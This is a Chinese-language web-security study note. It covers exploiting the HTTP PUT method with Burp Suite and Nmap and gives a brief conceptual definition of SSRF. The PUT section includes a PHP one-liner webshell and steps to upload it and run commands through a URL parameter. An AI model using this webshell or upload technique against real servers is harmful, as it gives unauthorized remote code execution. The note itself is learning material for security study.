Web安全学习笔记(二):HTTP Put方法利用和SSRF基本概念
---------------开始---------------
0x01:前言
之前在挖公益SRC的时候,用Nmap扫描时候可以扫到http支持的方法,其中有几个可以利用PUT方法,作为标准的小菜鸟,听说过这个方法,但是具体利用可真不会呀,也在网上找了相关文章,但是都不详细。直到昨天看到一篇文章,今天上午拿来学习了一番,具体讲的是如何利用,这个确实不错,对于实战来说提升很大。回过头来去找那几个网站,可是PUT方法已经被禁用了,对于这个方法的实战,有缘见到一定好好鼓捣一番。
那篇文章有很多利用方法,基于我现在也只学了两招利用的方法,对于我来说够用了。
对于SSRF今天基本看了下概念,大致了解了理论的意思,但是具体实战今天确实没做,过两天找两个例子去实战一下,加深一下SSRF的理解。这个漏洞也一定要熟练掌握。
---------------正题(一)---------------
●HTTP Put方法利用:
PUT方法请求服务器去把请求里的实体存储在请求URI(Request-URI)标识下。
▶▶▶.BurpSuite利用Put方法:
①.设置相关代理 ---> 抓包拦截请求 ---> 右击发送到Repeater模块
②.将GET方法替换为PUT方法 ---> 上传一个test.php文件
③.在请求体中写上恶意利用代码(写个一句话木马就可以了)
♢穿插一个PHP一句话木马(<?php @eval($_GET["cmd"])?> )
④.如果响应头的状态码显示"201 Created",说明已被成功创建
⑤. 创建成功后一句话木马的利用,xxx.com/test.php?cmd="想要执行的命令"
▶▶▶.Nmap利用Put方法:
利用命令:
nmap -p 80 目标IP地址 -script http-put -script-args http-put.url="需上传目标网址的路径", http-put.file="你要上传文件的位置"
若显示:"http-put: /xxx/test.php was Successfully created" 说明上传成功了
注:其实整理这两个是为了留给自己看了,下面贴一下那篇文章的地方,对于Put方法的利用大概有个六七种,大家都可以学习一下~
通往知识的大门:http://www.4hou.com/technology/12885.html
---------------正题(二)---------------
●服务端请求伪造(Server-Side Request Forgery, SSRF)
▶定义:
由攻击者构造形成由服务端发起请求的一个安全漏洞,一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。正因它是由服务端发起的,故它能够请求到与它相连而与外网隔离的内部系统。
▶形成原因:
服务端提供了从其他服务器应用获取数据的功能,但没有对目标地址过滤与限制。
今天对于SSRF仅是了解了个概念,然后就去找SRC实战挖洞了,今天毫无战果。对于SSRF的实战回来找个靶机来试试,到时在来这记录下。
--------今天就这么结束了,时间过得真快--------